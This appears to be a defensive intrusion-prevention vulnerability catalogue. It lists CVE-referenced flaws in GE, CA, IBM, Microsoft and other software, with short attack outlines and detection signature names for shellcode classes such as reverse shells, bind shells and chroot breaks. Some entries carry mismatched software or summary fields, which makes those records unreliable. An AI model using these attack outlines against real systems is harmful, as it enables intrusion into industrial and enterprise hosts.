First detected in:

sgpkg-ips-1080-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

General Electric MDS PulseNET

Type:

Input Validation

Description:

There has been reported a vulnerability in GE MDS PulseNET and PulseNET Enterprise. A remote unauthenticated attacker can exploit this vulnerability by sending a specially crafted serialized object to the target server. Successful exploitation might lead to arbitrary code execution.

Situation:

Generic_CS-GE-Mds-Pulsenet-Remote-Invocation-Insecure-Deserialization

References:

CVE-2018-10611
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10611

GE-Mds-Pulsenet-Spring-Remoting-Httpinvoker-Insecure-Deserialization

About this vulnerability:

A vulnerability in General Electric MDS PulseNET

Risk:

Moderate

First detected in:

sgpkg-ips-1081-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

General Electric MDS PulseNET

Type:

Input Validation

Description:

Deserialization of untrusted data causes a vulnerability in General Electric MDS PulseNET. A successful exploit allows an attacker to run arbitrary code with the privileges of the PulseNET program.

Situation:

File-Binary_GE-Mds-Pulsenet-Spring-Remoting-Httpinvoker-Insecure-Deserialization

References:

CVE-2018-10611
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10611

GE-Proficy-CIMPLICITY-WebView-Directory-Traversal

About this vulnerability:

A GE Proficy CIMPLICITY WebView Directory Traversal vulnerability.

Risk:

High

First detected in:

sgpkg-ips-701-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Red Hat CloudForms

Type:

Input Validation

Description:

A directory traversal vulnerability in GE Proficy Cimplicity WebView, versions 4.01 through 8.0, in substitute.bcl, which allows remote attackers to read arbitrary files via a crafted packet.

Situation:

Generic_CS-GE-Proficy-Historian-ihDataArchiver-Buffer-Overflow

References:

CVE-2013-0653
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0653

BID-57505
http://www.securityfocus.com/bid/57505

OSVDB-89490
http://www.osvdb.org/89490

GE-Proficy-Historian-ihDataArchiver-Buffer-Overflow

About this vulnerability:

A vulnerability in GE Proficy

Risk:

High

First detected in:

sgpkg-ips-608-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

GE Proficy

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in in GE Proficy which allows remote attacker to execute malicious code on target system.

Situation:

References:

CVE-2011-1918
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1918

BID-50475
http://www.securityfocus.com/bid/50475

GE-Proficy-Historian-Keyhelp-ActiveX-Remote-Code-Execution

About this vulnerability:

A vulnerability in General Electric Proficy Historian

Risk:

Moderate

First detected in:

sgpkg-ips-475-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

GE Proficy

Type:

Input Validation

Description:

A remote code execution vulnerability has been reported in GE Proficy Historian's KeyHelp ActiveX control. The vulnerability is due to insufficient validation of input supplied to the LaunchTriPane() function. A remote, unauthenticated attacker can exploit this vulnerability by enticing an unsuspecting user to access a malicious web site. This can lead to code execution in the context of the affected user.

Situation:

File-Text_GE-Proficy-Historian-Keyhelp-ActiveX-Remote-Code-Execution

References:

CVE-2012-2516
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2516

OSVDB-83311
http://www.osvdb.org/83311

GE-Proficy-Real-Time-Information-Portal-Directory-Traversal

About this vulnerability:

A vulnerability in General Electric Proficy Real-Time Information Portal

Risk:

Moderate

First detected in:

sgpkg-ips-474-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

GE Proficy

Type:

Directory Traversal

Description:

A directory traversal vulnerability has been identified in GE Proficy Real-Time Information Portal. The vulnerability is due to insufficient validation of two strings contained inside ID_SAVE_SRVC_CFG message requests received by rifsrvd.exe, which listens on port 5159/TCP. A remote, unauthenticated attacker could exploit this vulnerability by sending maliciously crafted requests to the affected application. In the case of a successful attack, the attacker may overwrite arbitrary files on the file system.

Situation:

Generic_CS-GE-Proficy-Real-Time-Information-Portal-Directory-Traversal

References:

CVE-2012-0232
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0232

BID-52439
http://www.securityfocus.com/bid/52439

Genbroker-Service-Denial-Of-Service

About this vulnerability:	GENESIS32 version 9.21 and older, GENESIS64 version 10.51 and older integer overflow DOS
Risk:	High
First detected in:	sgpkg-ips-628-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	ICONICS Genesis
Type:	Malfunction
Description:	A vulnerability in ICONICS Genbroker service that allows an attacker to crash the service by sending a specially crafted tcp packet.
Situation:	Generic_CS-Genbroker-Service-Denial-Of-Service

General-Electric-D20-Password-Recovery

About this vulnerability:

A General Electric D20 Password Recovery vulnerability.

Risk:

High

First detected in:

sgpkg-ips-702-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

General Electric

Type:

Insecure Configuration

Description:

A vulnerability in General Electric D20ME units, and possibly others, which allows remote attackers to retrieve usernames, passwords, and authentication level list.

Situation:

TFTP_General-Electric-D20-Password-Recovery

References:

CVE-2012-6663
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-6663

Generate-Cgi-File-Disclosure

About this vulnerability:

Generate.cgi arbitrary file disclosure

Risk:

Moderate

First detected in:

sgpkg-ips-2-1102

Last changed:

sgpkg-ips-1637-5242

Platform:

Generic

Software:

Sixhead SIX-webboard

Type:

Directory Traversal

Description:

Generate.cgi in Sixhead SIX-webboard 2.01 does not validate input properly, allowing users to view or retrieve files not normally accessible from the host.

References:

CVE-2001-1115
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1115

BID-3175
http://www.securityfocus.com/bid/3175

Generic-AIX-ShellCode

About this vulnerability:	Shellcode for AIX operating system
Risk:	High
First detected in:	sgpkg-ips-6-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	AIX
Software:	<os>
Type:	Buffer Overflow
Description:	This is a generic vulnerability description for shellcode that can be executed on IBM AIX. Shellcode is a set of platform-specific machine instructions that are used to execute commands in buffer overflow attacks.
Situation:	Shared_ShellCode-AIX-Execve Shared-UDP_ShellCode-AIX-Execve

Generic-BSD-PPC-ShellCode

About this vulnerability:	Shellcode for BSD/PPC operating system.
Risk:	High
First detected in:	sgpkg-ips-6-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	BSD
Software:	<os>
Type:	Buffer Overflow
Description:	This is a generic vulnerability description for shellcode that can be executed on BSD/PPC. Shellcode is a set of platform-specific machine instructions that are used to execute commands in buffer overflow attacks.
Situation:	Shared_ShellCode-BSD-PPC-Execve

Generic-BSDi-ShellCode

About this vulnerability:	Shellcode for BSDi operating system.
Risk:	High
First detected in:	sgpkg-ips-6-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	BSDi
Software:	<os>
Type:	Buffer Overflow
Description:	This is a generic vulnerability description for shellcode that can be executed in BSDi operating system. Shellcode is a set of platform-specific machine instructions that are used to execute commands in buffer overflow attacks.
Situation:	Shared_ShellCode-BSDi-Execve Shared_ShellCode-BSDi-Execve-2 Shared_ShellCode-BSDi-Execve-Toupper-Evasion

Generic-CA-BrightStor-Arcserve-Backup-Tape-Engine-RPC-Buffer-Overflow

About this vulnerability:

A buffer overflow vulnerability in Computer Associates BrightStor ARCserve Backup

Risk:

High

First detected in:

sgpkg-ips-93-1314

Last changed:

sgpkg-ips-1554-5242

Platform:

Windows

Software:

Computer Associates BrightStor; Computer Associates Business Protection Suite 2; Computer Associates Server Protection Suite 2

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in Computer Associates BrightStor ARCserver Backup. A crafted request made to the affected service may be used to execute code in the context of the backup tape engine, leading to system compromise.

Situation:

MSRPC-TCP_CPS-CA-BrightStor-Arcserve-Backup-Tape-Engine-RPC-Buffer-Overflow

References:

CVE-2007-0169
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0169

BID-22005
http://www.securityfocus.com/bid/22005

Generic-CA-Message_Queuing-BOF

About this vulnerability:

Buffer Overflows in CA Message Queuing

Risk:

High

First detected in:

sgpkg-ips-43-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

CA Message Queuing

Type:

Buffer Overflow

Description:

Remote exploitable buffer overflows exists in Computer Associates (CA) Message Queuing (CAM / CAFT) versions 1.05, 1.07 before Build 220_13, and 1.11 before Build 29_13. Successful exploits cause denial of service and remote access without authentication. Working exploits are publicly available.

Situation:

Generic_CA-Message-Queuing-BOF

References:

CVE-2005-2668
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2668

BID-14622
http://www.securityfocus.com/bid/14622

OSVDB-18916
http://www.osvdb.org/18916

Generic-DG-UX-ShellCode

About this vulnerability:	Shellcode for DG/UX operating system.
Risk:	High
First detected in:	sgpkg-ips-6-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	DG UX
Software:	<os>
Type:	Buffer Overflow
Description:	This is a generic vulnerability description for shellcode that can be executed in DG/UX operating system. Shellcode is a set of platform-specific machine instructions that are used to execute commands in buffer overflow attacks.
Situation:	Shared_ShellCode-DG-UX-Execve

Generic-FreeBSD-ShellCode

About this vulnerability:	Shellcode for FreeBSD operating system.
Risk:	High
First detected in:	sgpkg-ips-6-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	FreeBSD
Software:	<os>
Type:	Buffer Overflow
Description:	This is a generic vulnerability description for shellcode that can be executed in FreeBSD operating system. Shellcode is a set of platform-specific machine instructions that are used to execute commands in buffer overflow attacks.
Situation:	Shared_ShellCode-FreeBSD-Execve Shared_ShellCode-FreeBSD-Passive-Connect

Generic-FTGate4-Buffer-Overflow

About this vulnerability:

Detects FTGate4 Buffer Overflow Exploits

Risk:

Moderate

First detected in:

sgpkg-ips-57-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Floosietek FTGatePro

Type:

Buffer Overflow

Description:

FTGate4 is a Windows communication suite that combines mail handling facilities with Groupware functionality. FTGate 4.4 has a stack based buffer overflow vulnerability that can be exploited via a specially crafted POST or GET request. If the tzoffset parameter contains more than 196 characters, a stack buffer overflow occurs allowing a remote attacker to cause a DoS or possibly execute arbitrary code.

Situation:

HTTP_CRL-FTGate4-Buffer-Overflow-Vulnerability

References:

CVE-2005-4569
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4569

BID-15972
http://www.securityfocus.com/bid/15972

Generic-Gnu-Tar-PAX-Extended-Headers-Handling-Buffer-Overflow

About this vulnerability:

Gnu Tar PAX extended headers handling buffer overflow

Risk:

Moderate

First detected in:

sgpkg-ips-63-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

GNU Tar

Type:

Buffer Overflow

Description:

The GNU Tar program has a buffer overflow vulnerability. If a malformed Tar archive is delivered to a target user who opens it with the vulnerable program, a DoS or possibly arbitrary code execution may occur.

Situation:

HTTP_Gnu-Tar-PAX-Extended-Headers-Handling-Buffer-Overflow
E-Mail_BS-Gnu-Tar-PAX-Extended-Headers-Handling-Buffer-Overflow
File-Binary_Gnu-Tar-PAX-Extended-Headers-Handling-Buffer-Overflow

References:

CVE-2006-0300
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0300

BID-16764
http://www.securityfocus.com/bid/16764

OSVDB-23371
http://www.osvdb.org/23371

Generic-HP-UX-ShellCode

About this vulnerability:	Shellcode for HP-UX operating system.
Risk:	High
First detected in:	sgpkg-ips-6-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	HP-UX
Software:	<os>
Type:	Buffer Overflow
Description:	This is a generic vulnerability description for shellcode that can be executed in HP-UX operating system. Shellcode is a set of platform-specific machine instructions that are used to execute commands in buffer overflow attacks.
Situation:	Shared_ShellCode-HP-UX-Execve

Generic-HTTP-Exploit

About this vulnerability:	Suspicious traffic patterns
Risk:	Moderate
First detected in:	sgpkg-ips-418-4219
Last changed:	sgpkg-ips-1790-5242
Platform:	Generic
Software:	<os>
Type:	Malfunction
Description:	This vulnerability refers to a number of situations that detect known suspicious or malicious traffic patterns.
Situation:	Generic_CS-Suspicious-Request Generic_SS-Suspicious-Traffic Generic_UDP-Suspicious-Packet Generic_UDP-Malicious-Packet Generic_UDP-Suspicious-Server-Certificate DNS-UDP_Suspicious-Query DNS-UDP_Suspicious-Response HTTP_CS-Suspicious-File-Upload HTTP_CS-Suspicious-Request-URI HTTP_CS-Request-To-Suspicious-Poc-File HTTP_CSU-Suspicious-Request HTTP_CS-Request-To-Suspicious-File-With-Obsolete-Browser HTTP_CS-Request-To-Suspicious-Poc-File-With-Obsolete-Browser HTTP_CSH-MS-Suspicious-Headers-Detected HTTP_CRL-Malicious-Request HTTP_SHS-Suspicious-Server-Reply SMTP_CS-Suspicious-Command E-Mail_Suspicious-Header NNTP_Suspicious-Traffic SSH_Suspicious-Server-Response HTTP_CRL-RIG-EK-Request Telnet_CCS-Suspicious-Authentication-Request NetBIOS-TCP_Suspicious-Request MSRPC-TCP_Suspicious-Request HTTPS_CS-Suspicious-Handshake-Request HTTPS_CS-Suspicious-Client-Request HTTPS_SS-Suspicious-Server-Response HTTPS_SS-Suspicious-Server-Certificate SMB-TCP_CHS_Suspicious-Request NetBIOS-UDP_Suspicious-Request SNMP-UDP_Malformed-Get RFB_CS-Suspicious-Request RFB_SS-Suspicious-Server-Response POP3_CS-Suspicious-Packet BOOTP_CS-Suspicious-Request LDAP_CS-Suspicious-Packet LDAP_SS-Suspicious-Packet TNS_CS-Suspicious-Request SIP-TCP_Malicious-Request SIP-UDP_CS-Malicious-Request SVN_Suspicious-Request HTTP_CHS-Suspicious-Host HTTP_CSH-Known-Exploit-Kit-Headers File-Text_RIG-EK-Lander-Script File-Text_EK-Flash-Loader-Script File-Text_Suspicious-Flash-Detector-Script File-OLE_Suspicious-File File-Flash_Suspicious-Flash-File File-Flash_Adobe-Flash-CVE-2013-5331 File-Flash_Adobe-Flash-CVE-2013-0634 File-Flash_RIG-EK-Exploit File-Flash_DoSWF-Obfuscation File-Flash_Magnitude-Exploit-Stager File-Flash_Suspicious-Content-From-IP-Address-Host File-Flash_Video-Content-From-IP-Address-Host File-Flash_Suspicious-Content-From-Random-Host File-PDF_Suspicious-File File-PDF_Coolpdf-Reader-CVE-2012-4914 File-Binary_Suspicious-File File-Binary_SketchUp-Pict-File-CVE-2013-3664 File-Binary_Microsoft-Access-CVE-2013-3156 File-Binary_Windows-OpenType-CVE-2013-3128 File-Binary_Oracle-Outside-In-CVE-2013-5791 File-Binary_Microsoft-Access-CVE-2013-3155 HTTP_CS-Request-To-Suspicious-File File-Text_Suspicious-Text-File File-JPEG_Suspicious-File File-PNG_Suspicious-File File-GIF_Suspicious-File File-GIF_MS-DirectShow-CVE-2013-3174 File-RTF_Suspicious-File File-TextId_Suspicious-Text-File File-MPEG_Suspicious-File File-Zip_Suspicious-File-Detected File-Exe_Suspicious-File File-Exe_Themida-Packed-Executable File-Exe_Themida-Packed-Executable-2 File-Text_Suspicious-Text-File-2

Generic-HTTP-URI-Directory-Traversal

About this vulnerability:	HTTP URI directory traversal
Risk:	Moderate
First detected in:	sgpkg-ips-58-1210
Last changed:	sgpkg-ips-1638-5242
Platform:	Generic
Software:	<os>
Type:	Directory Traversal
Description:	Many web server implementations are vulnerable to directory traversal attempts. Using vulnerable servers a remote attacker is able to access documents that are located outside the web root directory.
Situation:	HTTP_CRL-URI-Directory-Traversal-2

Generic-IBM-Lotus-Notes-HTML-Speed-Reader-Long-Url-Buffer-Overflow-Vulnerability

About this vulnerability:

IBM Lotus Notes HTML Speed Reader Long Url Buffer Overflow Vulnerability

Risk:

High

First detected in:

sgpkg-ips-60-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Lotus Notes

Type:

Buffer Overflow

Description:

IBM Lotus Notes HTML Speed Reader component has a buffer overflow vulnerability If a crafted HTML attachment is delivered to a Lotus Notes user who opens it andfollows a malious link a Dos or non-privileged code execution may occur.

Situation:

E-Mail_BS-IBM-Lotus-Notes-HTML-Speed-Reader-Long-Url-Buffer-Overflow
File-Text_IBM-Lotus-Notes-HTML-Speed-Reader-Long-Url-Buffer-Overflow

References:

CVE-2005-2618
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2618

BID-16576
http://www.securityfocus.com/bid/16576

OSVDB-23068
http://www.osvdb.org/23068

OSVDB-23067
http://www.osvdb.org/23067

OSVDB-23066
http://www.osvdb.org/23066

OSVDB-23065
http://www.osvdb.org/23065

OSVDB-23064
http://www.osvdb.org/23064

Generic-IBM-Tivoli-Storage-Manager-Express-Backup-Heap-Corruption

About this vulnerability:

IBM Tivoli Storage Manager Heap Corruption

Risk:

High

First detected in:

sgpkg-ips-213-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

IBM Tivoli Storage Manager

Type:

Input Validation

Description:

A buffer overflow vulnerability exists in IBM Tivoli Storage Manager. This vulnerability is due to a lack of validation of a user supplied value in a message. This value is later used as a counter to populate a fixed length heap buffer. A remote unauthenticated attacker may leverage this vulnerability to create a denial of service condition of the affected service, or inject and execute arbitrary code on the target host. In an attack case where code injection is not successful, the target IBM Tivoli Express Backup Server service will terminate. In a more sophisticated attack where code injection is successful, the behaviour of the target is entirely dependent on the intended function of the injected code. The code in such a case would execute with SYSTEM level privileges.

Situation:

Generic_IBM-Tivoli-Storage-Manager-Express-Backup-Heap-Corruption-2
Generic_IBM-Tivoli-Storage-Manager-Express-Backup-Heap-Corruption

References:

CVE-2008-4563
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4563

BID-34077
http://www.securityfocus.com/bid/34077

OSVDB-52617
http://www.osvdb.org/52617

Generic-IBM-Tivoli-Storage-Manager-Initial-Sign-On-Request-Buffer-Overflow

About this vulnerability:

Buffer overflow within initial sign-on request of IBM Tivoli Storage Manager

Risk:

Moderate

First detected in:

sgpkg-ips-86-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

IBM Tivoli Storage Manager

Type:

Input Validation

Description:

Buffer overflow within initial sign-on request of IBM Tivoli Storage Manager

Situation:

Generic_IBM-Tivoli-Storage-Manager-Initial-Sign-On-Request-Buffer-Overflow

References:

CVE-2006-5855
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5855

BID-21440
http://www.securityfocus.com/bid/21440

Generic-LDAP-Injection

About this vulnerability:	Generic LDAP Injection over HTTP
Risk:	Low
First detected in:	sgpkg-ips-149-2032
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Generic HTTP server
Type:	Malfunction
Description:	LDAP (Lightweight Directory Access Protocol) is a protocol for querying and modifying directory services. Many applications and services rely on LDAP directories for access control, privilege management and resource management. LDAP injection attacks are based on similar techniques than SQL injection attacks, and are usually made possible by insufficient input sanitation in server applications. Possible impacts of successful LDAP injection attacks range from information disclosures to privilege escalation allowing further attacks.

Generic-Linux-PPC-ShellCode

About this vulnerability:	Shellcode for Linux/PPC operating system.
Risk:	High
First detected in:	sgpkg-ips-6-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Linux
Software:	<os>
Type:	Buffer Overflow
Description:	This is a generic vulnerability description for shellcode that can be executed on Linux/PPC. Shellcode is a set of platform-specific machine instructions that are used to execute commands in buffer overflow attacks.
Situation:	Shared_ShellCode-Linux-PPC-Execve

Generic-Linux-Sparc-ShellCode

About this vulnerability:	Shellcode for Linux/Sparc operating system.
Risk:	High
First detected in:	sgpkg-ips-6-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Linux
Software:	<os>
Type:	Buffer Overflow
Description:	This is a generic vulnerability description for shellcode that can be executed in Linux/SPARC. Shellcode is a set of platform-specific machine instructions that are used to execute commands in buffer overflow attacks.
Situation:	Shared_ShellCode-Linux-Sparc-Setreuid-Execve Shared_ShellCode-Linux-Sparc-Setreuid-Execve2 Shared_ShellCode-Linux-Sparc-Setreuid-Setregid-Execve Shared_ShellCode-Linux-Sparc-Setreuid-Tolower-Execve Shared_ShellCode-Linux-Sparc-Setuid-Execve

Generic-Linux-X86-ShellCode

About this vulnerability:	Shellcode for Linux/x86 operating system.
Risk:	High
First detected in:	sgpkg-ips-6-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Linux
Software:	<os>
Type:	Buffer Overflow
Description:	This is a generic vulnerability description for shellcode that can be executed in Linux/x86. Shellcode is a set of platform-specific machine instructions that are used to execute commands in buffer overflow attacks.
Situation:	Shared_ShellCode-Linux-X86-Bind Shared_ShellCode-Linux-X86-Chroot-Break-1 Shared_ShellCode-Linux-X86-Chroot-Break-2 Shared_ShellCode-Linux-X86-Chroot-Break-3 Shared_ShellCode-Linux-X86-Connect Shared_ShellCode-Linux-X86-Drop-Shell Shared_ShellCode-Linux-X86-Execve-Binsh-1 Shared_ShellCode-Linux-X86-Execve-Binsh-2 Shared_ShellCode-Linux-X86-Mini-Sh Shared_ShellCode-Linux-X86-Portshell Shared_ShellCode-Linux-X86-File-Append Shared_ShellCode-Linux-X86-Reverse-Telnet Shared_ShellCode-Linux-X86-SCC Shared_ShellCode-Linux-X86-Setregid-Execve Shared_ShellCode-Linux-X86-Tmp-Sh Shared_ShellCode-Linux-X86-Execve-Tolower-Evasion Shared_ShellCode-Linux-X86-Execve-Toupper-Evasion Shared_ShellCode-Linux-X86-Write-1 Shared_ShellCode-Linux-X86-Write-2 Shared_ShellCode-Linux-X86-Xterm Shared_ShellCode-Linux-X86-Execve-0xff-Less

Generic-Malicious-Iframe

About this vulnerability:	A malicious iframe used by exploit stagers detected.
Risk:	Moderate
First detected in:	sgpkg-ips-851-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Generic browser
Type:	Code Injection
Description:	A malicious iframe used by exploit stagers was detected.
Situation:	File-Text_Malicious-Iframe-2

Generic-Mozilla-Thunderbird-Iframe-JavaScript-Execution

About this vulnerability:

JavaScript execution vulnerability in Mozilla Thunderbird

Risk:

Moderate

First detected in:

sgpkg-ips-63-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Mozilla Thunderbird

Type:

Code Injection

Description:

The Mozilla Thunderbird email client has a JavaScript execution vulnerability. The vulnerability can be exploited by sending a crafted email message containing malious JavaScript code in the src attribute between Iframe tags to a target user who opens the message with the vulnerable email client and edits the message, for example by replying to it. A successful attack leads to arbitrary JavaScript code execution.

Situation:

E-Mail_BS-Mozilla-Thunderbird-Iframe-JavaScript-Execution
File-Text_Mozilla-Thunderbird-Iframe-JavaScript-Execution

References:

CVE-2006-0884
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0884

BID-16770
http://www.securityfocus.com/bid/16770

OSVDB-23653
http://www.osvdb.org/23653

Generic-MSDTC-BuildContextW-Denial-Of-Service

About this vulnerability:

Denial of service vulnerability in Microsoft DTC BuildContextW method (MS06-018)

Risk:

Moderate

First detected in:

sgpkg-ips-66-1210

Last changed:

sgpkg-ips-1555-5242

Platform:

Windows

Software:

<os>

Type:

Buffer Overflow

Description:

Microsoft Windows Distributed Transaction Coordinator (MSDTC) suffers from a denial of service vulnerability. Remote attackers can cause the MSDTC service to crash by binding to the MSDTC RPC service and sending a malicious request to the BuildContextW method. This vulnerability is similar to the one patched in MS05-051, but does not allow remote code execution.

Situation:

MSRPC-TCP_CPS-PnP-MSDTC-BuildContextW-Denial-Of-Service

References:

CVE-2006-1184
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1184

BID-17905
http://www.securityfocus.com/bid/17905

OSVDB-25336
http://www.osvdb.org/25336

MS06-018
http://technet.microsoft.com/security/bulletin/MS06-018

Generic-MSDTC-BuildContextW-Memory-Corruption

About this vulnerability:

Memory corruption vulnerability in Microsoft DTC BuildContextW method

Risk:

Critical

First detected in:

sgpkg-ips-41-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Windows Distributed Transaction Coordinator

Type:

Buffer Overflow

Description:

Microsoft Windows Distributed Transaction Coordinator (MSDTC) suffers from a buffer overflow vulnerability. Remote attackers can execute arbitrary code with SYSTEM privileges by connecting to the MSDTC server and sending a malicious request to the MSDTC RPC interface's BuildContextW method.

Situation:

MSRPC-TCP_CPS-MSDTC-BuildContextW-Memory-Corruption-2
Generic_MSDTC-BuildContextW-Memory-Corruption
Generic_MSDTC-BuildContextW-Memory-Corruption-2

References:

CVE-2005-2119
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2119

BID-15056
http://www.securityfocus.com/bid/15056

OSVDB-18828
http://www.osvdb.org/18828

MS05-051
http://technet.microsoft.com/security/bulletin/MS05-051

Generic-NetBSD-ShellCode

About this vulnerability:	Shellcode for NetBSD operating system.
Risk:	High
First detected in:	sgpkg-ips-6-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	NetBSD
Software:	<os>
Type:	Buffer Overflow
Description:	This is a generic vulnerability description for shellcode that can be executed on NetBSD. Shellcode is a set of platform-specific machine instructions that are used to execute commands in buffer overflow attacks.
Situation:	Shared_ShellCode-NetBSD-Execve

Generic-Novell-NetMail-NMAP-Stor-Command-Buffer-Overflow

About this vulnerability:

A vulnerability in Adobe Acrobat Reader allows cross site scripting

Risk:

Moderate

First detected in:

sgpkg-ips-91-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Novell NetMail

Type:

Buffer Overflow

Description:

There is a buffer overflow in the Novell Netmail. A STOR command for the NMAP componet can be used to overflow a static buffer. This may lead to code execution or denial of service.

Situation:

Generic_Novell-NetMail-NMAP-Stor-Command-Buffer-Overflow

References:

CVE-2006-6424
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6424

BID-21725
http://www.securityfocus.com/bid/21725

Generic-OpenBSD-ShellCode

About this vulnerability:	Shellcode for OpenBSD operating system.
Risk:	High
First detected in:	sgpkg-ips-6-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	OpenBSD
Software:	<os>
Type:	Buffer Overflow
Description:	This is a generic vulnerability description for shellcode that can be executed on OpenBSD. Shellcode is a set of platform-specific machine instructions that are used to execute commands in buffer overflow attacks.
Situation:	Shared_ShellCode-OpenBSD-Passwd-Modify Shared_ShellCode-OpenBSD-Reverse-Portshell Shared_ShellCode-OpenBSD-Portshell

Generic-Oracle-WebCache-Invalid-Request-DoS

About this vulnerability:

Oracle WebCache Invalid Request DoS

Risk:

Low

First detected in:

sgpkg-ips-85-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Oracle 9i

Type:

Malfunction

Description:

Oracle 9i Web Admin denial of service with malformed URI request.

Situation:

Generic_Oracle-WebCache-Invalid-Request-DoS

References:

CVE-2002-0386
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0386

BID-5902
http://www.securityfocus.com/bid/5902

Generic-SCO-OpenServer-ShellCode

About this vulnerability:	Shellcode for SCO OpenServer operating system.
Risk:	High
First detected in:	sgpkg-ips-6-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	SCO
Software:	<os>
Type:	Buffer Overflow
Description:	This is a generic vulnerability description for shellcode that can be executed on SCO OpenServer. Shellcode is a set of platform-specific machine instructions that are used to execute commands in buffer overflow attacks.
Situation:	Shared_ShellCode-SCO-OpenServer-Chroot-Break Shared_ShellCode-SCO-OpenServer-Execve

Generic-SCO-UnixWare-ShellCode

About this vulnerability:	Shellcode for SCO UnixWare operating system.
Risk:	High
First detected in:	sgpkg-ips-6-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	SCO
Software:	<os>
Type:	Buffer Overflow
Description:	This is a generic vulnerability description for shellcode that can be executed on SCO UnixWare. Shellcode is a set of platform-specific machine instructions that are used to execute commands in buffer overflow attacks.
Situation:	Shared_ShellCode-SCO-UnixWare-Execve

Generic-Shared-Variables

About this vulnerability:	Not a vulnerability, fingerprints that set shared variables refer to this VID
Risk:	Low
First detected in:	sgpkg-ips-24-1210
Last changed:	sgpkg-ips-1866-5242
Platform:	Generic
Software:	<os>
Type:	Malfunction
Description:	This is not vulnerability. Fingerprints that set shared variables refer to this VID. Some groups have fingerprints that only set shared variables that are used by other fingerprints in the group. Disabling such fingerprints will break any fingerprint that uses the shared variables.
Situation:	Generic_SS-Shared-Variables-Fingerprint Generic_UDP-Shared-Variables Shared_SS-Shared-Variables HTTP_CSU-Shared-Variables HTTP_CSH-Shared-Variables HTTP_CS-Shared-Variables-For-Client-Stream-Context HTTP_CRL-Shared-Variables HTTP_SHS-Shared-Variables SMTP_CS-Shared-Variables SMTP_Shared-Variables-For-Server-Stream-Context E-Mail_HCS-Shared-Variables E-Mail_BS-Shared-Variables HTTP_Shared-Variables-For-Server-Stream-Context FTP_SS-Shared-Variables FTP_CS-Shared-Variables-For-Client-Stream-Context NNTP_CS-Shared-Variable-Fingerprint SSH_CS-Shared-Variables SSH_SS-Shared-Variables Telnet_CS-Shared-Variables Telnet_Shared-Variables Telnet_STS-Shared-Variables SMB-TCP_Shared-Variable-Fingerprint MSRPC-TCP_CPS-Shared-Variable-Fingerprints HTTPS_CS-Shared-Variables-For-Client-Stream-Context HTTPS_SS-Shared-Variables-For-Server-Stream-Context SMB-TCP_CHS-Shared-Variable-Fingerprint IMAP_Server-Shared-Variables POP3_Server-Shared-Variables HTTP_SCH-Shared-Variables BOOTP_Shared-Variables Generic_CS-Shared-Variable-Fingerprints LDAP_SS-Shared-Variables-For-Server-Stream-Context SIP_Shared-Variables HTTP_SLS-Shared-Variables HTTP_URL-Shared-Variables HTTP_PSU-Shared-Variables HTTP_PSH-Shared-Variables HTTP_CSC-Shared-Variables HTTP_Shared-Variables-For-Server-Ie-Stream-Context IPv6_Shared-Variables File-OLE_Shared-Variables File-Flash_Shared-Variables File-PDF_Shared-Variables File-Binary_Shared-Variables HTTP_SHS-Shared-Variables-2 File-Text_Shared-Variables File-JPEG_Shared-Variables 